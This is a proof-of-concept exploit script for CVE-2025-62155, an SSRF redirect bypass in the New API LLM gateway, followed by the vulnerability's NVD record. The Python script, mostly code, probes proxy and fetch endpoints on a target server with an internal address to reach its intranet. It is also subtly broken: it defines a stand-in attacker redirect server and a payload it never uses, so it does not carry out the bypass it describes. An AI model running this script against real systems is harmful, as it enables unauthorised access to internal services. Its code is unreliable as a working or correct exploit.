CVE-2025-62155

# CVE-2025-62155 SSRF Bypass PoC # Target: New API < 0.9.6 # Attack: Use 302 redirect to bypass SSRF protection import requests import argparse def exploit_ssrf(target_url, redirect_to): """ Exploit SSRF via 302 redirect bypass target_url: The vulnerable endpoint accepting user-controlled URLs redirect_to: Internal address to target (e.g., http://127.0.0.1:8080) """ # Create a redirect server that points to internal resource redirect_server = f"http://attacker-controlled-server.com/redirect?target={redirect_to}" # Alternatively, use a controlled server with 302 redirect payload = { 'url': redirect_to, # May be blocked 'redirect_url': redirect_to # Bypass via this parameter } # Try common vulnerable endpoints endpoints = [ '/api/fetch', '/api/proxy', '/api/request', '/fetch', '/proxy' ] for endpoint in endpoints: try: response = requests.post( target_url + endpoint, json={'url': redirect_to}, timeout=10, allow_redirects=True # This allows SSRF bypass ) print(f"Endpoint: {endpoint}") print(f"Status: {response.status_code}") print(f"Response: {response.text[:500]}") print("---") except requests.exceptions.RequestException as e: print(f"Error on {endpoint}: {e}") def main(): parser = argparse.ArgumentParser(description='CVE-2025-62155 SSRF Bypass') parser.add_argument('--target', required=True, help='Target New API server URL') parser.add_argument('--internal', default='http://127.0.0.1:8080', help='Internal target') args = parser.parse_args() exploit_ssrf(args.target, args.internal) if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-62155", "sourceIdentifier": "[email protected]", "published": "2025-11-25T00:15:46.560", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "New API is a large language mode (LLM) gateway and artificial intelligence (AI) asset management system. Prior to version 0.9.6, a recently patched SSRF vulnerability contains a bypass method that can bypass the existing security fix and still allow SSRF to occur.\nBecause the existing fix only applies security restrictions to the first URL request, a 302 redirect can bypass existing security measures and successfully access the intranet. This issue has been patched in version 0.9.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/QuantumNous/new-api/security/advisories/GHSA-9f46-w24h-69w4", "source": "[email protected]"}]}}